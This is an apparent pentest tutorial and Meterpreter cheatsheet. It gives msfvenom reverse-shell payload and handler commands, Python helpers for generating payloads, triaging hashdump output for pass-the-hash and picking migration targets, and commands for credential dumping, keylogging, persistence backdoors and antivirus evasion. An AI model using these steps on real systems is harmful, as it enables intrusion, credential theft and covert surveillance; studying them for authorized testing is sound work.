Meterpreter Commands Cheatsheet: Essential Post-Exploitation for Pentesters
The Meterpreter payload, part of the Metasploit Framework, is your go-to advanced, dynamic, and extensible post-exploitation agent. It gives you an interactive shell on a compromised system, enabling a wide array of actions from file system manipulation and network pivoting to privilege escalation and credential dumping. Think of it as your Swiss Army knife once you've gained initial access – it's designed specifically for post-exploitation tasks, offering capabilities far beyond a standard shell.
For any pentester, red teamer, or OSCP candidate, mastering Meterpreter commands is non-negotiable. It's the critical link between initial compromise and achieving your engagement objectives, whether that's maintaining persistence, exfiltrating data, or pivoting deeper into a network.
Getting Started with Meterpreter: Establishing Your Foothold
Before you can use Meterpreter commands, you need a Meterpreter session. This typically involves crafting a payload with msfvenom, delivering it to a target, and starting a Metasploit listener (usually exploit/multi/handler) to catch the incoming connection. The handler's PAYLOAD, LHOST and LPORT must match exactly what you gave msfvenom; a staged payload whose handler is set to a different architecture or transport will connect back and then die without ever opening a session. Once the target executes your payload, you'll see that glorious "Meterpreter session X opened" message, and you're in business.
From my experience, the initial setup can sometimes be the trickiest part, especially with antivirus solutions or network firewalls in play. Always test your payloads in isolated environments first to understand their behavior.
Key Takeaway: A Meterpreter session isn't just a shell; it's a powerful agent designed for sophisticated post-exploitation, making it indispensable for advanced offensive operations.
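The procedure above has one classic failure point: the msfvenom payload and the handler are configured separately and drift apart. The following is an added example, not code from the original article or from Metasploit itself, that derives both from one set of parameters, tells staged from stageless payloads by Metasploit's naming convention, and emits a resource script you can run with `msfconsole -q -r handler.rc`. The attacker address, port and payload name in the demo are assumptions.

```python
# Added example, not code from the original article: generate the msfvenom
# command and the multi/handler resource script from one set of parameters so
# PAYLOAD, LHOST and LPORT cannot differ between the two ends. The address,
# port and payload names used in the demo are assumptions for illustration.
import ipaddress
from typing import List

MIGRATE_MODULE = "post/windows/manage/migrate"  # run automatically on every new session


def is_stageless(payload: str) -> bool:
    """Metasploit writes staged payloads as <arch>/meterpreter/<transport>
    and stageless ones as <arch>/meterpreter_<transport>; only the final
    path segment differs, so that is what we inspect."""
    last = payload.rsplit("/", 1)[-1]
    return last.startswith(("meterpreter_", "shell_"))


def validate(lhost: str, lport: int, payload: str) -> None:
    """Reject the mistakes that most often produce a handler that never
    catches anything. This helper insists on a literal IP for LHOST so the
    value resolves identically on both ends (Metasploit itself also accepts
    hostnames)."""
    ipaddress.ip_address(lhost)  # raises ValueError for a hostname or garbage
    if not 1 <= lport <= 65535:
        raise ValueError(f"LPORT out of range: {lport}")
    if "meterpreter" not in payload:
        raise ValueError(f"not a Meterpreter payload: {payload}")


def msfvenom_argv(lhost: str, lport: int, payload: str,
                  fmt: str = "exe", out: str = "payload.exe") -> List[str]:
    """Argument vector for msfvenom; hand it to subprocess.run or print it."""
    validate(lhost, lport, payload)
    return ["msfvenom", "-p", payload, f"LHOST={lhost}", f"LPORT={lport}",
            "-f", fmt, "-o", out]


def handler_rc(lhost: str, lport: int, payload: str) -> str:
    """Resource script for `msfconsole -q -r handler.rc`. ExitOnSession=false
    keeps the listener up for later callbacks, -j -z backgrounds the job, and
    AutoRunScript migrates each new session before you touch it."""
    validate(lhost, lport, payload)
    lines = [
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",
        f"set AutoRunScript {MIGRATE_MODULE}",
        "exploit -j -z",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Demo values (assumptions): attacker at 10.10.14.5, HTTPS callback on 443.
    demo = ("10.10.14.5", 443, "windows/x64/meterpreter/reverse_https")
    print("stageless:", is_stageless(demo[2]))
    print(" ".join(msfvenom_argv(*demo)))
    print(handler_rc(*demo), end="")
```

Write the returned script to a file and start it with `msfconsole -q -r handler.rc`; the same `demo` tuple feeds msfvenom, so the two ends agree by construction. Swap the payload for `windows/x64/meterpreter_reverse_https` when you want a stageless binary (larger, but no second-stage download for the handler to get wrong).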
Core Meterpreter Commands: Your First Steps on a Compromised System
Once you've got a session, knowing where to start is key. These foundational commands help you get your bearings and begin interacting with the target.
| Command | Description | Example Use Case |
|---|---|---|
| `help` | Lists the available Meterpreter commands grouped by extension (core, stdapi, priv, and whatever you have loaded). | `help`; append `-h` to any command (e.g. `migrate -h`) for its options |
| `background` | Puts the current session in the background and returns you to the msfconsole prompt; `sessions -i <id>` brings it back. | `background` (manage several sessions at once) |
| `exit` | Terminates the current Meterpreter session. | `exit` (when you are done with a host) |
| `sysinfo` | Shows the computer name, OS and build, architecture, system language, domain, number of logged-on users, and the architecture/platform of the Meterpreter payload itself. | `sysinfo` (quick overview; note whether the payload is x86 or x64 before you migrate) |
| `getuid` | Shows the user the session is running as. | `getuid` (know your privileges before anything else) |
| `getprivs` | On Windows, enables and lists the privileges available to the current token. | `getprivs` (look for SeDebugPrivilege, SeImpersonatePrivilege) |
| `idletime` | Seconds since the last user input on the target. | `idletime` (is someone at the keyboard right now?) |
Essential Meterpreter Commands for Post-Exploitation Tactics
This is where Meterpreter truly shines. These commands let you move beyond initial access and perform common post-exploitation tasks, crucial for any red team engagement or Metasploit Post Exploitation scenario.
System Information and Reconnaissance with Meterpreter
Understanding your environment is paramount. Meterpreter offers several ways to gather intelligence on the compromised host.
- `ps`: Lists running processes with PID, PPID, name, architecture, session, owner and path. Invaluable for picking a process to migrate into and for spotting security software.
- `getpid`: Shows the PID of the process hosting Meterpreter; check it against `ps` to see how exposed you are.
- `getsystem`: Tries the built-in local privilege escalation techniques (named-pipe impersonation and token duplication) to become NT AUTHORITY\SYSTEM. It needs local administrator rights to begin with; `getsystem -h` lists the techniques, and a failure here is not a dead end, just a sign that you need a real privilege escalation vector first.
- `getenv <VAR>`: Shows environment variables (`getenv PATH TEMP` for several at once); tool paths and script locations turn up here.
- `reboot` / `shutdown`: Restarts or powers off the target. Use with caution: you lose the session and almost certainly get the user's attention.
File System Interaction: Moving Data In and Out
One of the most frequent tasks in post-exploitation is interacting with the target's file system. Meterpreter provides intuitive commands for this.
- `ls`: Lists directory contents, just like the Linux `ls` you know.
- `cd <directory>` / `pwd`: Changes or prints the current working directory on the target.
- `lcd <directory>` / `lpwd`: The same for your attacking machine, which is where `download` writes and `upload` reads from.
- `upload <local_file> <remote_path>`: Copies a file from your machine to the target. This is how you deliver additional tools or scripts.
- `download <remote_file> <local_path>`: Copies a file from the target to your machine. Essential for pulling configuration files, logs or other evidence.
- `search -d <directory> -f <pattern>`: Finds files by name pattern (`search -d C:\\Users -f *.kdbx`).
- `mkdir <directory>` / `rm <file>`: Creates a directory or deletes a file on the target.
- `edit <file>`: Edits a file on the target with the built-in vi-style editor.
- `cat <file>`: Displays a file's contents.
Expert Tip: When uploading or downloading, always consider the file's permissions on the target and ensure your Meterpreter session has the necessary rights to read/write to the desired locations.
Network Pivoting and Port Forwarding with Meterpreter
Often, your initial compromise only gives you access to one machine. To move laterally or access internal services, you'll need to pivot. Meterpreter's networking commands are incredibly powerful for this.
- `ipconfig` (alias `ifconfig`): Shows the target's interfaces, IP addresses and MAC addresses. Crucial for working out which networks the host can reach.
- `route`: Prints or edits the target's own routing table (`route add` / `route delete`). To send Metasploit modules through the session, add the pivot route in msfconsole instead: `route add 10.10.10.0 255.255.255.0 <session_id>`, or `run post/multi/manage/autoroute` from the session.
- `portfwd add -l <local_port> -p <remote_port> -r <remote_host>`: Opens a listener on your attacking machine and relays it, through the compromised host, to a host that only the compromised host can reach. For example, `portfwd add -l 3389 -p 3389 -r 10.10.10.20` lets you point your RDP client at 127.0.0.1:3389 to reach the internal machine's RDP service.
- `portfwd list`: Lists active port forwards.
- `portfwd delete -l <local_port> -p <remote_port> -r <remote_host>`: Removes a specific forward (`portfwd flush` removes them all).
I've used portfwd countless times to access internal web servers, databases, or even RDP sessions that are otherwise inaccessible from my attacking machine. It's a cornerstone of lateral movement.
Process Management and Privilege Escalation
Gaining higher privileges is often a primary objective. Meterpreter helps you manage processes and elevate your standing.
- `migrate <PID>`: Moves Meterpreter into another process. Your session lives and dies with its host process, so if you landed in something short-lived (a browser tab, an exploited service about to be restarted), move early. Migrate into a long-lived process owned by the same user you are now (`explorer.exe` for an interactive user, `winlogon.exe` or another SYSTEM-owned process once you are SYSTEM): you inherit the target process's token, so migrating into a lower-privileged process drops your privileges.
- `execute -f <executable> [-a <args>] [-H] [-i] [-c]`: Runs a program on the target. `-f` names the executable, `-a` passes its arguments, `-H` hides the window, `-i` interacts with it (so `execute -f cmd.exe -H -i` gives you a hidden command prompt), `-c` channelizes its I/O so you can read it later, and `-t` runs it with the token you are currently impersonating.
- `kill <PID>`: Terminates a process.
- `steal_token <PID>`: Duplicates the token of the named process and impersonates it, so the session acts as that process's user; it needs enough access to open the process (SeDebugPrivilege or ownership). `drop_token` (or `rev2self`) reverts to your original context.
Credential Dumping with Meterpreter
One of the most valuable pieces of information you can get from a compromised system is credentials. Meterpreter provides modules to help with this.
- `hashdump`: Dumps the local SAM hashes (LM and NTLM) in `user:RID:LM:NT:::` format. You need SYSTEM for this; as a mere administrator it fails.
- `run post/windows/gather/smart_hashdump`: Picks the dumping technique that fits your privileges and host type (workstation vs. domain controller) and saves the results to loot.
- `run post/windows/gather/cachedump`: Dumps cached domain logon verifiers (MSCache/DCC2). These are slow to crack and cannot be passed, but they tell you which domain accounts have logged on here.
- `run post/windows/gather/enum_logged_on_users`: Lists users currently and recently logged on, which tells you whose credentials are likely to be in memory.
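Before you spray anything from a `hashdump`, it pays to read the dump properly: the two empty-string hashes tell you which accounts have LM disabled and which have no password at all, and accounts sharing an NT hash share a password. The block below is an added example, not code from the original article or from Metasploit; `SAMPLE_HASHDUMP` is constructed, and every value in it is made up except the two well-known empty-string hashes.

```python
# Added example, not from the original article: parse hashdump output into
# structured records and triage it before doing anything with the hashes.
# SAMPLE_HASHDUMP is constructed for this example; every value in it is made
# up except the two well-known empty-string hashes.
import re
from dataclasses import dataclass
from typing import Dict, List

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM("") : no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT("") : the password is blank
HEX32 = re.compile(r"^[0-9a-f]{32}$")

SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacybox:1002:1c3a2b4d5e6f70819a2b3c4d5e6f7081:9a8b7c6d5e4f30211a2b3c4d5e6f7081:::
"""


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def blank_password(self) -> bool:
        # hashdump does not show whether the account is disabled; check that too
        return self.nt == EMPTY_NT

    @property
    def lm_stored(self) -> bool:
        # a real LM hash means a password of 14 chars or fewer, weakly hashed
        return self.lm != EMPTY_LM

    @property
    def builtin_admin(self) -> bool:
        return self.rid == 500  # the RID, not the name, identifies the built-in admin

    def pth(self) -> str:
        """LM:NT form that Metasploit's SMBPass option accepts for pass-the-hash."""
        return f"{self.lm}:{self.nt}"


def parse_hashdump(text: str) -> List[Account]:
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            raise ValueError(f"not a hashdump line: {line!r}")
        lm, nt = parts[2].lower(), parts[3].lower()
        if not (HEX32.match(lm) and HEX32.match(nt)):
            raise ValueError(f"malformed hash field in: {line!r}")
        accounts.append(Account(parts[0], int(parts[1]), lm, nt))
    return accounts


def triage(accounts: List[Account]) -> Dict[str, object]:
    """What the dump tells you before you spray anything: who is worth a
    pass-the-hash attempt, who has no password, who still stores LM hashes,
    and which accounts share an NT hash (same password, so one crack or one
    PtH success covers them all)."""
    by_nt: Dict[str, List[str]] = {}
    for a in accounts:
        by_nt.setdefault(a.nt, []).append(a.user)
    return {
        "pth_candidates": {a.user: a.pth() for a in accounts if not a.blank_password},
        "blank_password": [a.user for a in accounts if a.blank_password],
        "lm_stored": [a.user for a in accounts if a.lm_stored],
        "shared_nt": {h: users for h, users in by_nt.items() if len(users) > 1},
    }


if __name__ == "__main__":
    for key, value in triage(parse_hashdump(SAMPLE_HASHDUMP)).items():
        print(f"{key}: {value}")
```

In the constructed sample, `svc_backup` shares its NT hash with the built-in Administrator, which is the password reuse you want to notice before trying `exploit/windows/smb/psexec` with `SMBPass` set to the `LM:NT` string; the `legacybox` entry shows what a stored LM hash looks like when a host still allows them.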
For credentials still in memory (LSASS), Meterpreter ships Mimikatz as the kiwi extension: `load kiwi` then `creds_all` or `kiwi_cmd <mimikatz command>`. It needs SYSTEM and a Meterpreter architecture matching the OS, so on 64-bit Windows migrate into a 64-bit process first. Our detailed guide on Mimikatz Dump Password: Extracting Credentials in Post-Exploitation covers this extensively.
Advanced Meterpreter Techniques and Modules
Meterpreter isn't just about basic commands; it's extensible through modules and scripts, allowing for complex operations.
Achieving Persistence
Maintaining access after a system reboot or user logout is crucial for red teams. Meterpreter has modules to help establish persistence.
- `run persistence -U -i <interval> -p <port> -r <LHOST>`: The legacy Meterpreter script that installs a reconnecting backdoor. Its options: `-U` installs for the current user (runs at logon), `-X` installs for the machine (runs at boot, needs admin), `-S` installs as a service, `-i` is the reconnect interval in seconds, `-p` the port and `-r` your listening host (LHOST). The script drops a payload and a registry entry, and reports a cleanup resource file you should keep for the end of the engagement. Metasploit has deprecated these scripts in favour of modules; on current versions use `exploit/windows/local/persistence` (Run-key based) or `exploit/windows/local/persistence_service` with SESSION and a payload of your choice.
- Other persistence techniques involve scheduled tasks, modifying startup programs, or injecting into legitimate processes. Whatever you use, record exactly what you created so it can be removed.
Screenshotting and Keylogging
Gathering visual and input data can be incredibly insightful during an engagement.
- `screenshot`: Captures the target's desktop and saves the image on your machine. Useful for confirming user activity or spotting sensitive data on screen. It needs a process with a desktop, so from a service context migrate into the user's `explorer.exe` first.
- `keyscan_start`: Starts recording keystrokes. The logger only sees input to the desktop session your host process belongs to: migrate into the logged-on user's `explorer.exe` to capture what they type, or (as SYSTEM) into `winlogon.exe` to capture the password typed at the lock screen.
- `keyscan_dump`: Displays the keystrokes collected so far.
- `keyscan_stop`: Stops the keylogger.
Token Impersonation and Session Hijacking
Windows tokens can be a goldmine for privilege escalation and lateral movement. Meterpreter allows you to manipulate them.
- `incognito` extension: Load it with `load incognito`.
- `list_tokens -u`: Lists the tokens available to you by user (`-g` lists them by group). Delegation tokens can authenticate to other systems on the network; impersonation tokens only work on the local machine.
- `impersonate_token <token_name>`: Runs your session under the listed token, giving you that user's privileges without knowing the password. Escape the backslash or quote the name: `impersonate_token "DOMAIN\\user"`. Use `rev2self` to go back to your own context.
Migrating Processes for Stability and Evasion
As mentioned earlier, `migrate <PID>` is vital. But why exactly? If your initial exploit lands Meterpreter in a volatile process (a browser tab that might close, a service about to be restarted), moving to a long-lived process (`explorer.exe`, or `winlogon.exe` and other SYSTEM-owned processes once you are SYSTEM) keeps the session alive. Pick a process owned by the user you currently are and of the same architecture as your payload (the `Meterpreter` line in `sysinfo`); you take on the target process's token, so migrating into a lower-privileged process loses privileges. Migration also changes which process name appears next to your network connection, which can make a casual look at the process list less alarming, but the migration itself (opening a remote process, allocating memory and starting a thread in it) is exactly the behaviour EDR products watch for, so do not count on it as an evasion technique.
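The selection rules above (same owner, same architecture, long-lived name first) are easy to apply by eye on a quiet box and easy to get wrong on a busy one. The following is an added example, not code from the original article or from Metasploit, that parses `sysinfo` and `ps` output as Meterpreter prints it and ranks migration targets; it also serves the `migrate` entry in the Process Management section. `SAMPLE_SYSINFO` and `SAMPLE_PS` are constructed, with made-up hostnames, PIDs and users, but the column layout follows Meterpreter's output.

```python
# Added example, not from the original article: parse `sysinfo` and `ps`
# output and pick migration targets that will not change who you are.
# SAMPLE_SYSINFO and SAMPLE_PS are constructed; hostnames, PIDs and users
# are made up, but the column layout follows what Meterpreter prints.
import re
from typing import Dict, List

SAMPLE_SYSINFO = """\
Computer        : DESKTOP-1
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
"""

SAMPLE_PS = r"""
Process List
============

 PID   PPID  Name               Arch  Session  User                 Path
 ---   ----  ----               ----  -------  ----                 ----
 0     0     [System Process]
 4     0     System             x64   0
 612   524   winlogon.exe       x64   1        NT AUTHORITY\SYSTEM  C:\Windows\System32\winlogon.exe
 1184  1100  explorer.exe       x64   1        DESKTOP-1\alice      C:\Windows\explorer.exe
 2216  1184  chrome.exe         x86   1        DESKTOP-1\alice      C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 2330  1184  notepad.exe        x64   1        DESKTOP-1\alice      C:\Windows\System32\notepad.exe
"""

# Long-lived processes the article recommends, in order of preference.
PREFERRED = ["explorer.exe", "winlogon.exe"]


def session_arch(sysinfo_text: str) -> str:
    """The `Meterpreter : x64/windows` line gives the payload's architecture,
    which is what matters for migration, not the host's `Architecture` line."""
    m = re.search(r"^Meterpreter\s*:\s*(x64|x86)/", sysinfo_text, re.MULTILINE)
    if not m:
        raise ValueError("no Meterpreter line in sysinfo output")
    return m.group(1)


def parse_ps(text: str) -> List[Dict[str, object]]:
    """Rows are column-aligned with at least two spaces between columns, so a
    split on runs of two or more spaces survives single spaces inside a user
    name or path. Kernel pseudo-processes without owner columns are skipped."""
    rows = []
    for line in text.splitlines():
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) < 6 or not cols[0].isdigit():
            continue
        rows.append({
            "pid": int(cols[0]), "ppid": int(cols[1]), "name": cols[2],
            "arch": cols[3], "session": int(cols[4]), "user": cols[5],
            "path": cols[6] if len(cols) > 6 else "",
        })
    return rows


def migrate_candidates(rows, current_user: str, arch: str) -> List[int]:
    """PIDs to try with `migrate`, best first. Two filters matter:
    - owner == the user from `getuid`: you cannot open another user's
      process without privileges, and when you can (SYSTEM), migrating into
      it makes the session run as that user, i.e. you silently lose SYSTEM;
    - same architecture as the session, to avoid the x86/x64 mismatch.
    Preferred names sort first, any other eligible process is the fallback."""
    eligible = [r for r in rows
                if r["user"].lower() == current_user.lower()
                and r["arch"] == arch and r["pid"] > 4]

    def rank(r):
        name = r["name"].lower()
        return PREFERRED.index(name) if name in PREFERRED else len(PREFERRED)

    return [r["pid"] for r in sorted(eligible, key=rank)]


if __name__ == "__main__":
    rows = parse_ps(SAMPLE_PS)
    arch = session_arch(SAMPLE_SYSINFO)
    print("as alice  :", migrate_candidates(rows, r"DESKTOP-1\alice", arch))
    print("as SYSTEM :", migrate_candidates(rows, r"NT AUTHORITY\SYSTEM", arch))
```

Run against the sample as `DESKTOP-1\alice` with an x64 payload it proposes `explorer.exe` first and `notepad.exe` as a fallback, skipping the x86 `chrome.exe` and the SYSTEM-owned `winlogon.exe`; as SYSTEM it proposes only `winlogon.exe`, which is the point: the user's `explorer.exe` would cost you SYSTEM.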
Meterpreter Scripting and Automation
Meterpreter isn't just about individual commands; you can automate complex tasks using its run command with various post-exploitation modules or even custom scripts. These scripts often simplify common workflows, like gathering system information, extracting credentials, or setting up persistence with a single command.
- `run <script or module>`: Executes a legacy Meterpreter script or a post module against the current session, for example `run post/windows/gather/enum_shares`.
- `run getgui -e`: The legacy script that enables RDP on the target. It has been deprecated along with the other scripts; use `run post/windows/manage/enable_rdp` instead, which can also add a user for the RDP logon.
- `AutoRunScript`: Not a Meterpreter command but a handler option. `set AutoRunScript post/windows/manage/migrate` on exploit/multi/handler runs the module on every new session the moment it opens, which is how you get automatic migration before you have even typed anything.
Learning to use these run commands effectively can dramatically speed up your post-exploitation phase, allowing you to focus on analysis rather than repetitive manual tasks.
Meterpreter Best Practices and OSCP Prep
For anyone preparing for the OSCP exam or working in a professional pentesting environment, how you use Meterpreter matters just as much as knowing the commands.
- Always Migrate: Seriously, make `migrate` your second command after `sysinfo`. Move to a stable process owned by your current user, with the same architecture as your payload. This saves you from losing precious sessions.
- Take Screenshots: Document your findings. Screenshots prove impact and help you remember what you saw.
- Be Stealthy: Avoid using noisy commands unnecessarily. Clean up any artifacts (files uploaded, persistence installed, accounts added) if it's within your scope.
- Document Everything: Keep a running log of commands you use, output you see, and any credentials or hashes you find. This is crucial for reports and for the OSCP exam.
- Understand Context: Always know what user context you're in (`getuid`, `getprivs`) and what network segment you're on (`ipconfig`). This informs your next move.
- Practice, Practice, Practice: The best way to master Meterpreter is to use it in various scenarios. Set up vulnerable VMs and practice different post-exploitation paths.
On the OSCP exam, Meterpreter is a tool, not a solution. You'll need to know *when* and *how* to use its commands to achieve specific objectives. It's often a stepping stone to further exploitation, like using gathered hashes for lateral movement via Pass-the-Hash, or leveraging a shell to compile and run custom privilege escalation exploits. For more on preparing for the exam, consider our guide on Mastering OSCP Exam Preparation: Your Blueprint to Certification.
Troubleshooting Common Meterpreter Issues
Things don't always go smoothly in the world of pentesting. Here are some common Meterpreter hiccups and how to deal with them:
- Session Dies Immediately: First check that the handler's PAYLOAD (including x86 vs. x64 and the transport) matches what you built with msfvenom; a staged payload whose stage does not fit the process dies right after connecting. If the configuration is right, the target's antivirus or EDR is probably killing the process: try a stageless payload, a different delivery method, or a different exploit. Encoding with `msfvenom -e` changes the bytes on disk but rarely fools modern signature and behaviour engines. It could also be process instability; migrate immediately if you get a brief window.
- Commands Not Working: Check your privileges (`getuid`, `getprivs`). Many commands require elevated rights (SYSTEM for `hashdump`, for example). Make sure you've loaded the extension a command belongs to (`load incognito` for `list_tokens` and `impersonate_token`, `load kiwi` for `creds_all`), and that the extension's architecture matches the process you are in.
- Network Issues (portfwd not working): Verify connectivity from the compromised host to the destination of the forward (can it reach that host and port at all?). Check host firewalls on the compromised machine and on your attacker machine, and make sure nothing else is already listening on the local port; picking a different `-l` port sometimes resolves it.
- "Operation failed" or "Error": This is generic, but often means permission denied or the target resource doesn't exist. Double-check paths, filenames, and user privileges.
Bottom Line: Meterpreter is an incredibly powerful agent, but it's not magic. Understanding the underlying operating system and network principles will help you troubleshoot effectively.
Mastering Meterpreter commands transforms your initial shell into a full-fledged control center. It's a critical component of the post-exploitation phase, giving you the tools to explore, exfiltrate, and escalate. Keep this cheatsheet handy, but more importantly, get hands-on experience. The more you use it, the more intuitive and effective your post-exploitation efforts will become. Happy hunting!
Further reading: Metasploit Meterpreter Wiki; MITRE ATT&CK - Meterpreter
Frequently Asked Questions
What is Meterpreter in Metasploit?
Meterpreter is an advanced, in-memory, dynamic payload that provides an interactive shell on a compromised system. It's specifically designed for post-exploitation tasks, offering extensive capabilities for file system interaction, network pivoting, privilege escalation, and more, all within the Metasploit Framework.
How do I get a Meterpreter session?
You typically obtain a Meterpreter session by crafting a malicious payload (often with Msfvenom), delivering it to a target system, and then setting up a Metasploit listener (like multi/handler) to catch the incoming connection when the target executes the payload.
What are the most important Meterpreter commands for OSCP?
For OSCP, focus on commands for system information (sysinfo, getuid, getprivs), file system interaction (ls, cd, upload, download), process management (ps, migrate), network pivoting (ipconfig, portfwd), and credential gathering (hashdump, load incognito, impersonate_token). The ability to use getsystem and establish persistence is also crucial.
Can Meterpreter bypass antivirus?
Default Meterpreter payloads are well known to antivirus (AV) and EDR products and are usually detected on disk or at launch. Encoding with msfvenom's encoders changes the bytes on disk but seldom defeats modern engines, which also inspect behaviour and memory; what helps is keeping the payload off disk or in a custom loader, using stageless payloads over an encrypted transport such as reverse_https so the second stage is not seen in clear, and testing against the target's specific product in a lab first. It's a constant cat-and-mouse game between attackers and security vendors.